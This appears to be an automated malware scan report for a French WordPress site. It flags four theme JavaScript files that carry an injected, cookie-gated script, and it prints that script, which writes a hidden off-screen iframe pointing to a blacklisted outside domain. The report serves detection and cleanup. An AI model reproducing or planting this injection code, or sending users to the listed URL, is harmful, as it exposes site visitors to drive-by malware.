Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=fn84.fr
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://fn84.fr/ | 200 OK Content-Length: 24005 Content-Type: text/html | clean |
http://fn84.fr/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/javascript | clean |
http://fn84.fr/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://fn84.fr/wp-content/themes/highwind/framework/js/modernizr.min.js?ver=2.6.2 | 200 OK Content-Length: 7908 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: flifkaros.70-30.com.ar ...[199 bytes skipped]... ='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo('lirmanusik'); if (cookie == undefined) { setCookie('lirmanusik', true, 259200); document.write('<iframe src="http://flifkaros.70-30.com.ar/stuiportul16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe>'); } } Art_protection(); window.Modernizr=function(e,t,n){function N(e){f.cssText=e}function C(e,t){return N(h.join(e+";")+(t||""))}function k(e,t){return typeof e===t}function L(e,t){return!!~(""+e).indexOf(t)}function A(e,t){for(var r in e){var i=e[r];if(!L(i,"-")&&f[i]!==n)return t=="pfx"?i:!0}return!1}function O(e,t,r){for(var i in e){ ...[3043 bytes skipped]... Decoded script: <iframe src="http://flifkaros.70-30.com.ar/stuiportul16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe> Malicious iFrame found. size: 131x131 src: http://flifkaros.70-30.com.ar/stuiportul16.html This URL is marked by Google as suspicious <iframe src="http://flifkaros.70-30.com.ar/stuiportul16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"> | ||
http://fn84.fr/wp-content/themes/highwind/framework/js/fitvids.min.js?ver=1.0 | 200 OK Content-Length: 3290 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: flifkaros.70-30.com.ar ...[199 bytes skipped]... ='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo('lirmanusik'); if (cookie == undefined) { setCookie('lirmanusik', true, 259200); document.write('<iframe src="http://flifkaros.70-30.com.ar/stuiportul16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe>'); } } Art_protection(); (function(e){"use strict";e.fn.fitVids=function(t){var n={customSelector:null};if(!document.getElementById("fit-vids-style")){var r=document.createElement("div"),i=document.getElementsByTagName("base")[0]||document.getElementsByTagName("script")[0];r.className="fit-vids-style";r.id="fit-vids-style";r.style.display="none";r ...[1762 bytes skipped]... Decoded script: <iframe src="http://flifkaros.70-30.com.ar/stuiportul16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe> Malicious iFrame found. size: 131x131 src: http://flifkaros.70-30.com.ar/stuiportul16.html This URL is marked by Google as suspicious <iframe src="http://flifkaros.70-30.com.ar/stuiportul16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"> | ||
http://fn84.fr/wp-content/themes/highwind/framework/js/plugins.min.js?ver=4.0 | 200 OK Content-Length: 1060 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: flifkaros.70-30.com.ar ...[199 bytes skipped]... ='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo('lirmanusik'); if (cookie == undefined) { setCookie('lirmanusik', true, 259200); document.write('<iframe src="http://flifkaros.70-30.com.ar/stuiportul16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe>'); } } Art_protection(); (function(e){e(0).each(function(){e(this).html(e(this).html().replace(/&/,"<span class='ampersand'>&</span>"))});e("table tr:nth-child(2n)").addClass("alt")})(jQuery); Decoded script: <iframe src="http://flifkaros.70-30.com.ar/stuiportul16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe> Malicious iFrame found. size: 131x131 src: http://flifkaros.70-30.com.ar/stuiportul16.html This URL is marked by Google as suspicious <iframe src="http://flifkaros.70-30.com.ar/stuiportul16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"> | ||
http://fn84.fr/wp-content/themes/highwind/framework/js/script.min.js?ver=4.0 | 200 OK Content-Length: 2005 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: flifkaros.70-30.com.ar ...[199 bytes skipped]... ='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo('lirmanusik'); if (cookie == undefined) { setCookie('lirmanusik', true, 259200); document.write('<iframe src="http://flifkaros.70-30.com.ar/stuiportul16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe>'); } } Art_protection(); (function(e){jQuery(document).ready(function(e){jQuery("body").fitVids();jQuery("ul.sub-menu").parent().addClass("parent");jQuery(".nav-toggle").click(function(e){e.preventDefault();jQuery("body").toggleClass("show-nav")});jQuery(".nav-close").click(function(e){e.preventDefault();jQuery("body").removeClass("show-nav")});va ...[834 bytes skipped]... Decoded script: <iframe src="http://flifkaros.70-30.com.ar/stuiportul16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe> Malicious iFrame found. size: 131x131 src: http://flifkaros.70-30.com.ar/stuiportul16.html This URL is marked by Google as suspicious <iframe src="http://flifkaros.70-30.com.ar/stuiportul16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"> | ||
http://fn84.fr/wp-includes/js/jquery/jquery.form.min.js?ver=3.37.0 | 200 OK Content-Length: 14720 Content-Type: application/javascript | clean |
http://fn84.fr/wp-content/plugins/ninja-forms/js/min/ninja-forms-display.min.js?ver=4.0 | 200 OK Content-Length: 19721 Content-Type: application/javascript | clean |
http://fn84.fr/?page_id=185 | 200 OK Content-Length: 25945 Content-Type: text/html | clean |
http://fn84.fr/?page_id=18 | 200 OK Content-Length: 27652 Content-Type: text/html | clean |
http://fn84.fr/?page_id=12 | 200 OK Content-Length: 25677 Content-Type: text/html | clean |
http://fn84.fr/?page_id=725 | 200 OK Content-Length: 25229 Content-Type: text/html | clean |
http://fn84.fr/wp-includes/js/comment-reply.min.js?ver=4.0 | 200 OK Content-Length: 757 Content-Type: application/javascript | clean |
http://fn84.fr/?page_id=3227 | 200 OK Content-Length: 25277 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: fn84.fr
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 24 Sep 2014 14:28:28 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: mediaplanBAK=R129295185; path=/; expires=Wed, 24-Sep-2014 15:33:44 GMT
Set-Cookie: mediaplan=R3757122369; path=/; expires=Wed, 24-Sep-2014 15:46:10 GMT
Set-Cookie: PHPSESSID=9pnl8tsbes27ss5otvubh9p2q2; path=/
Set-Cookie: wfvt_1143735636=5422d50bb6b76; expires=Wed, 24-Sep-2014 14:58:27 GMT; path=/; httponly
X-Pingback: http://fn84.fr/xmlrpc.php
X-Powered-By: PHP/5.3.28
GET / HTTP/1.1
Host: fn84.fr
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 24 Sep 2014 14:28:28 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: mediaplanBAK=R129295185; path=/; expires=Wed, 24-Sep-2014 15:33:44 GMT
Set-Cookie: mediaplan=R3757122369; path=/; expires=Wed, 24-Sep-2014 15:46:10 GMT
Set-Cookie: PHPSESSID=9pnl8tsbes27ss5otvubh9p2q2; path=/
Set-Cookie: wfvt_1143735636=5422d50bb6b76; expires=Wed, 24-Sep-2014 14:58:27 GMT; path=/; httponly
X-Pingback: http://fn84.fr/xmlrpc.php
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: fn84.fr
Referer: http://www.google.com/search?q=fn84.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: fn84.fr
Referer: http://www.google.com/search?q=fn84.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.